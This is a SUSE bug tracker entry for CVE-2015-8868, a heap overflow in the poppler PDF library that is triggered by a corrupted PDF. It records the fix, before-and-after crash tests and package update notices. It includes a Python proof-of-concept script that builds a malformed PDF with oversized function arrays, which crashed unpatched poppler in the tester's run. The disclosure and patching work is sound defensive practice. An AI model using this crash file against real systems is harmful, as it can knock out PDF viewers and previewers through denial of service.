Bug 976844 (CVE-2015-8868) - VUL-0: CVE-2015-8868: poppler: Corrupted PDF file can corrupt heap, causing DoS
Summary: VUL-0: CVE-2015-8868: poppler: Corrupted PDF file can corrupt heap, causing DoS
Status: RESOLVED FIXED
Alias: CVE-2015-8868
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Deadline: 2016-06-20
Assignee: Security Team bot
QA Contact: Security Team bot
URL:
Whiteboard: CVSSv2:SUSE:CVE-2015-8868:4.3:(AV:N/A...
Keywords:
Depends on:
Blocks:
 
Reported: 2016-04-22 12:47 UTC by Johannes Segitz
Modified: 2017-06-20 11:42 UTC (History)
1 user (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
poc (2.38 KB, application/x-gzip)
2016-04-22 12:47 UTC, Johannes Segitz 		Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2016-04-22 12:47:35 UTC 
Created attachment 674223 [details]
poc

no CVE atm

From: Felipe

This is a clean heap overflow. Lib is used in evince and okular and for
preview in nautilus. Versions pre 0.40.0 are vulnerable.

The patch:
https://cgit.freedesktop.org/poppler/poppler/commit/?id=b3425dd3261679958cd56c0f71995c15d2124433


A crashy pdf file is attached.

PoC.py
from miniPDF.miniPDF import *
#from miniPDF.miniPDFO import *
import zlib
#The document
doc = PDFDoc()

#font
font = PDFDict()
font.add("Name", PDFName("F1"))
font.add("Subtype", PDFName("Type1"))
font.add("BaseFont", PDFName("Helvetica"))

#name:font map
fontname = PDFDict()
fontname.add("F1",font)

#resources
resources = PDFDict()
resources.add("Font",fontname)


data = '''BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito
endstream
endobj
obj 1 0
99
endobj
Pedefeon!) Tj
ET /GS3 gs'''
#contents
contentsDict = PDFDict()
contents= PDFStream({},data)


length = PDFNum(len(data))
doc.add(length)
contents.add('Length',PDFRef(length))
#page
page = PDFDict()
page.add("Type",PDFName("Page"))
page.add("Resources",resources)
page.add("Contents", PDFRef(contents))

#pages
pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray([PDFRef(page)]))
pages.add("Count", PDFNum(1))

#add parent reference in page
page.add("Parent",PDFRef(pages))


#catalog
catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))

doc.add([catalog,pages,page,contents])
doc.setRoot(catalog)


#The Function thing
function = PDFDict()
function.add("FunctionType",PDFNum(2))
function.add("Domain",PDFArray([0,1]))
function.add("N",PDFNum(100))
#2261634.5098039214
size = 10000000
function.add("C0",PDFArray([2261634.5098039214]*size))
function.add("C1",PDFArray([2261634.5098039214]*size))


extgstate = PDFDict()
extgstate.add("Type",PDFName("ExtGState"))
extgstate.add("TR",function)

resources.add("ExtGState","<< /GS3 "+str(extgstate)+">>")

print doc
Comment 1 Swamp Workflow Management 2016-04-22 22:00:24 UTC 
bugbot adjusting priority
Comment 2 Petr Gajdos 2016-04-29 10:39:53 UTC 
Tested with 11 and 13.2:

Packages installed: poppler-tools, libpoppler*

BEFORE

$ pdftops crash.pdf 
Segmentation fault (core dumped)
$

AFTER

$ pdftops crash.pdf
Syntax Error: Function's C0 array is wrong length
Syntax Error: Function's C1 array is wrong length
Syntax Error: Function's C0 array is wrong length
Syntax Error: Function's C1 array is wrong length
$
Comment 3 Petr Gajdos 2016-04-29 10:45:27 UTC 
Packages submitted.
Comment 5 Bernhard Wiedemann 2016-04-29 11:00:20 UTC 
This is an autogenerated message for OBS integration:
This bug (976844) was mentioned in
https://build.opensuse.org/request/show/392089 13.2 / poppler
Comment 6 Swamp Workflow Management 2016-05-17 19:08:35 UTC 
openSUSE-SU-2016:1322-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
openSUSE 13.2 (src):    poppler-0.26.5-6.1, poppler-qt-0.26.5-6.1, poppler-qt5-0.26.5-6.1
Comment 7 Swamp Workflow Management 2016-06-06 10:47:17 UTC 
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2016-06-20.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/62801
Comment 8 Swamp Workflow Management 2016-06-10 18:08:01 UTC 
SUSE-SU-2016:1543-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Software Development Kit 12 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Server 12-SP1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Server 12 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Desktop 12 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
Comment 9 Swamp Workflow Management 2016-06-10 18:08:20 UTC 
SUSE-SU-2016:1544-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    poppler-0.12.3-1.12.1
SUSE Linux Enterprise Server 11-SP4 (src):    poppler-0.12.3-1.12.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    poppler-0.12.3-1.12.1
Comment 10 Swamp Workflow Management 2016-06-19 15:08:46 UTC 
openSUSE-SU-2016:1630-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
openSUSE Leap 42.1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1, poppler-qt5-0.24.4-12.1
Comment 11 Marcus Meissner 2017-06-20 11:42:45 UTC 
released